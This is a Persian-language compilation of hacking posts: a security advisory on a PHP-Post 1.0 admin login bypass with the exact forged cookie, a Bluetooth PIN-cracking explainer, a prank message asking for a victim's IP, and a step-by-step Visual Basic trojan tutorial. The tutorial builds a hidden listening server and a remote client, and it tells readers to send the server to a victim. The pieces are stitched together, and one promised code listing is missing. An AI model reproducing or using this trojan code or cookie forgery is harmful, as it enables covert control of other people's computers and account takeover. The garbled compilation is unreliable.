-------

مشخصات:
-----------------------
نام و نسخه محصول:
PHP-Post 1.0
سازنده:
http://php-post.co.uk/
نوع آسیب پذیری : دور زدن "ورود خودکار"
تاریخ کشف: 23 نوامبر 2005
تاریخ انتشار: 18 جولای 2006
تاریخ اطلاع به سازنده: 1 ژوئن 2006

درباره برنامه:
php-post یک سیستم مدیریت تالارگفتمان (فروم) که با php نوشته شده است.

شرح آسیب پذیری:
-----------------------
ضعف امنیتی در قسمت چکینگ برنامه برای ورود یک کاربر و در کل صفحات از جمله صفحات مدیریت سایت وجود دارد . این حفره از ساختار ضعیف امنیتی نشات گرفته و برای ورود خودکار کاربر (auto login) در تمام صفحات از کوکی بهره می برد . در صورتی که مهاجم تیک auto login را فعال کند برنامه به جای چک کردن session از cookie بدون نیاز به پسورد استفاده می کند هر چند که پسورد نیز به صورت کد شده در کوکی قرار می گیرد .

كد مخرب:
-----------------------
پس از ثبت نام و وارد شدن به حالت auto login کوکی های خود را از :
Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]=3nitr0; logincookie[last]=2006-07-07+05%3A24%3A44; logincookie[lastv]=1152264284; post[329]=330

به این حالت تغییر دهید که logincookieuser را به یوزرنیم مدیر سایت می بایستی تغییر دهید.
Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]="ADMIN`S USERNAME"; logincookie[last]=2006-07-07+05%3A24%3A44; logincookie[lastv]=1152264284; post[329]=330

راهکار امنيتي:
-----------------------
به دلیل اینکه کل طراحی امنیتی برنامه دچار آسیب پذیری بود بعد از فرصت تیم کپدا به سازنده برنامه نسخه جدید آن (1.01) منتشر شده و قابل دریافت از صفحه اصلی سایت php-post می باشد .

توسط:
-----------------------
farhadkey [at} kapda.ir
كانون پژوهشگران دانش امنيت - K

متخصصین علم رمز نگاری شیوه جدید رو برای هک کردن یک ارتباط بلوتوث پیدا کردند. ارزش این قضیه وقتی مشخص میشه که بدونین این شیوه حمله وقتی که موارد امنیتی ابزار بلوتوث فعال باشه هم کار میکنه !! هکرها با استفاده از این شیوه حمله میتونن توسط موبایل قربانی با هر جای دنیا که میخوان تماس برقرار کنند.

در آوریل 2005 بود که آقای اولی وایتهاوس انگلیسی راهی رو پیدا کرد که ابزارهای بلوتوث حتی اگه در مود امن هم قرار گرفته باشند میتونن مورد حمله قرار بگیرن. در این روش هکر میتونه هر تماسی رو با هر جایی که خواست توسط موبایل قربانی برقرار کنه .

البته ریسک این حمله بسیار پایینه... چون این الگوریتم وقتی کار میکنه که هکر دقیقا در زمانی که ارتباط بلوتوث میخواد شروع بشه .. به پروسه حمله بکنه.... پروسه ای بنام Pairing  .

همونطوری که قبلا هم گفته بودم دو ابزار بلوتوث وقتی میخوان ارتباط برقرار کنن باید یه کلید مخفی رو بین خودشون رد و بدل کنن. حتی دو متخصص اروپای شرقی اعلام کردن که میتونن چنان به ابزارهای بلوتوث  حمله کنن که این ابزارها هر وقت که هکرها بخواهند باهم ارتباط برقرار کنن !!!! (ای ول اروپای شرقـــی!).

اما شیوه آقای وایتهاوس چجوری عمل میکنه ؟ برای برقراری یک ارتباط بلوتوث به یک کلید پيوندي  (Link Key) نیاز هستکه پیش زمینه اون یک پین کد 4 رقمی هست. یعنی با ورود پین کد 4 رقمی درست ارتباط بلوتوث شروع به ساختن کلید پیوندی 128 بیتی میکنه. خب ! توسط یک اسنیفر بلوتوث میشه به این کلید پیوندی دست پیدا کرد.  این اسنیفر میتونه پیغامهای رد و بذل شده بین دو ابزار رو ضبط کنه و از طریق تحلیل اون پیامها توسط یه نرم افزار که الگوریتمهای شناسایی در بلوتوث رو بشناسه تمام  ۱۰۰۰۰ حالت ممکنه پین کد رو تست کرد.  این نوع حمله فقط میتونه در اولین تماس دو ابزار بلوتوث اتفاق بیفته. ولی اون دو تا متخصص اروپای شرقی کلک خیلی قشنگی زدن !! اونا یکی از ابزارهای بلوتوث رو مجبور میکنن که پیامی به اون یکی ابزار بده که "من کلید پیوندی رو فراموش کردم !" . این باعث میشه که ارتباط دو ابزار موقتا قطع بشه و با یک کلید پیوندی جدید ارتباط جدیدی ایجاد بشه.

اما وادار کردن فرستادن پیغام "من کلید پیوندی رو فراموش کردم !" کار خیلی ساده ای هست... هکر باید آی دی یکی از ابزارها رو استراق  سمع کنه که کار خیلی راحتیه. چون تمام ابزارهای بلوتوث این آی دی رو در اختیار همه ابزارهای دیگه ای که در برد قابل دسترسی (تا 100 متری) هستن میذاره !!

اين هم سورس كد يه اسنيفر بلوتوث هست كه فكر كنم خيلي بد

منبع : http://blog.websecurity.ir/

آموزش ساخت تروجان با ویژوال بیسیک/

كد هاي مخفي زير رو تصميم گرفتم upload كنم. كافي است كد ها رو copy & paste كنيد وئ ارسال كنيد. گرفتن ip: pLz gIVe mE yOUr IP خاموش كردن سيستم طرف KhaM00SH.K0n.JONeMAdArET و اين كه معركست .گفتن پسورد MISHE.PASS.BEDI.BARAYE.HaCk ok ؟

منبع  :    simorgh-ev آموزش ساخت تروجان با ویژوال بیسیک با اين تروجان مي توانيد Cdrom قرباني را داخل وبيرون بياريد . ومي توانيد براي قرباني Message بفرستيد خوب ! شروع مي كنيم : VB=(Visual basic) VB را اجرا كنيد و گزينه Standard Exe را انتخاب كنيد معمولا هر تروجان از 2 قسمت تشكيل شده 1.server كه براي قرباني ميفرستيم 2. Client خودمان باهاش كار مي كنيم خوب ! ما اول با هم Client را مي سازيم (دقت كنيد !) نام Form را به frmClient تغيير دهيد يكي از ابزاري كه نياز داريم Winsock Control 6.0 براي ارتباط با پورت سرور براي انتخاب اين گزينه : Ctrl+t را فشار دهيد يا در منوي Project گزينه Components را انتخاب كنيد.صفحه به نام Components باز ميشود كه بايد Winsock Control 6.0 را داخل ان پيدا وانتخاب كنيد ! بعد از انتخاب Winsock Control 6.0 اگر به نوار سمت چپ نگاه كنين شكلي بايد اضافه شده باشه : ---( Client )— حالا بايد گزينه هاي زير روي frmClient قرار بگيرد . 5 تا Command .. 2 تا textbox ... 1 وينشك ... label 1 بعد نام تمام اين گزينه ها را تغيير دهيد (همانند نامهاي زير )!!! دقت كنيد(مانند تغيير نام Form) Command1 - cmdConnect Command2 - cmdDisconnect Command3 - cmdOpen Command4 - cmdClose Command5 - cmdMsg Label1 - lblStatus Text1 - txtIP Text2 - txtMsg Winsock1 - tcpClient Caption گزينه ها را هم تغيير دهيد خوب الان ديگه وقت وارد كردن Code هاست بر روي كليد Connect(command1)دوبار كليك كنيد و باز شدن صفحه كد زير را وارد ان كنيد. دقت كنيد كد بايد بين 2 كاراكتر زير وارد شود!(روبروي كد ها نوع كار كد به انگليسي توضيح داده شده .از اونم مي توانيد كمك بگيريد ! Private Sub cmdConnect_Click() End Sub اين كد را بين اين 2 كاراكتر كپي كنيد .... بقيه هم به همين نوبت ! cmdConnect.Enabled = False ' disable the connect button cmdDisconnect.Enabled = True ' eable the connect button lblStatus.Caption = "Connecting" 'Show that you are trying to connect If txtIP.Text = "" Then 'if IP textbox is empty then MsgBox "Please enter a valid IP adress", vbCritical 'then give a messagebox End If tcpClient.Connect txtIP.Text, 1234 'connect to the IP you entered and on port 1234 در ا ينجا ما پورت را برابر 1234 قرار مي ديم روي كليد (Disconnect)(command2) نيز دو بار كليك كنيد وكد زير را وارد صفحه كنيد lblStatus.Caption = "Not Connected" 'Show that you are not connected cmdDisconnect.Enabled = False 'Disable the disconnect button cmdConnect.Enabled = True 'Enable the Connect button again tcpClient.Close 'Close the connection حالا بر روي شكل Winsock روي form دو بار كليك كنيد . وقتي صفحه كدها باز شد بالاي صفحه .سمت چپ از منو گزينه Connect را انتخاب كنيد وبين دو كاراكتر ايجاد شده در صفحه كدها. Private Sub tcpClient_Connect() End Sub كد زير را وارد كنيد : lblStatus.Caption = "Connected" 'Show that your connected to the Server بريم سراغ كدها سي دي رام : بر روي كليد Open cd-rom (command 3)دو بار كليك كنيد و بين دو كاراكتر ايجاد شده در صفحه كد . كد زير را وارد كنيد tcpClient.SendData "opn" 'send this string to the server همين كار رو با كليد Close cdrom (command 4) انجام بدين وكد زير را بين كاركترهاي ايجاد شده قرار بدين tcpClient.SendData "cls" 'send this string to the server ..روي كليد send massage (command 5) نيز دوبار كيك كنيد و كد زير را وارد كنيد tcpClient.SendData "msg" & txtMsg 'send this string to the server and the text in the textbox ((((( تبريك ميگم ؟!! شما الان Client را درست كردين ))))) فقط كافيه به صورت Exe كپي بشه !! همين !!!! اميدوارم Save كردنشو بلد باشي !! براي save : File>make ……(project نوبتم باشه . نوبت Server هست !! بريييييييييييييم! خوب يك Vb ديگه باز كنيد و Standard Exe را انتخاب كنيد در اينجا هم به winsock نياز داريم . همون كاري كه براي اوردن winsockدر client انجام دادين . اينجا هم انجام بدين ! Winsockرا روي form قرار بدين .بعد نام فورم و وينشك را مطابق زير تغير بدين Winsock = tcpServer Form = frmServer روي Form دو بار كليك كنيد و بين كاراكتر هاي ايجاد شده كد زير را كپي كنيد me.hide tcpServer.LocalPort = 1234 'listen on port 1234 tcpServer.Listen 'start listening حالا روي Winsock دو بار كليك كنيد و از منوي سمت چپ گزينه connection requestرا انتخاب و بين دو كاراكتر ايجاد شده در صفحه كدها . كد زير را وارد كنيد tcpServer.Close 'close to prevent any error tcpServer.Accept requestID 'accept all incoming requests دوباره با كليك بر روي Winsock از منوي سمت چپ صفحه كد باز شده گزينه errorرا انتخاب كنيد و بين كاراكترهاي ايجاد شده كد زير را كپي كنيد On Error Resume Next 'to prevent any more error's tcpServer.Close 'Close the connection tcpServer.Listen 'listen again حالا بايد يك module داشته باشيم براي آوردن آن : Project> Add Module>open حالا داخل Module زير را كپي كنيد Public Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long Dim SendStr As String, ReturnStr As String Public Function DoCommand(command As String, data As String) 'The server is performing a command Select Case LCase(command) 'Convert the command to lowercase and do a select case Case "opn" 'the client sends the string opn SendStr = mciSendString("Set cdaudio door open", ReturnStr, 0, 0) 'open the cd-rom door Case "cls" 'the client sends the string cls SendStr = mciSendString("Set cdaudio door closed", ReturnStr, 0, 0) 'close the cd-rom door Case "msg" 'The client wants a message box to be shown MsgBox data, vbInformation, "Information" ' Display the message to the server as a 'information messagebox End Select 'end the select case End Function 'end the function Module را ببنديد و روي Form دو بار كليك كنيد و كد زير را بالاي صفحه (دقت كنيد .بالا !) كپي كنيد Private Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA"( ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long دوباره روي Form كليك كنيد و كد زير را به صفحه كدها اضافه كنيد Private Sub tcpServer_DataArrival(ByVal bytesTotal As Long) Dim vardata As String Dim strdata As String ' Variable for holding the data received Dim cmddata As String * 3 ' This is for holding the command the server sent tcpServer.GetData strdata ' Get the data sent cmddata = Left(strdata, 3) ' This is the command the server sent vardata = Right(strdata, Len(strdata) - 3) ' This is the variable data DoCommand cmddata, vardata ' This function is in the commands module End Sub اينم تمام شد حالا save كنيد خوب اينم از سرور ( تبريك مي گم . شما يك Trojan نوشتيد !؟ ) حالا كافيه سرور را براي شخص مورد نظر بفرسين و پس از اطمينان از اجراي ان در كامپيوترش با وارد كردن ip او در Client به سيستم او وصل بشين و .........!؟ البته اينو بگم كه سرور قابليت اينو كه هر بار ويندوز لود ميشه . اجرا بشه را نداره و كارايي اين Trojan هم محدوده (open & close cdrom…Send message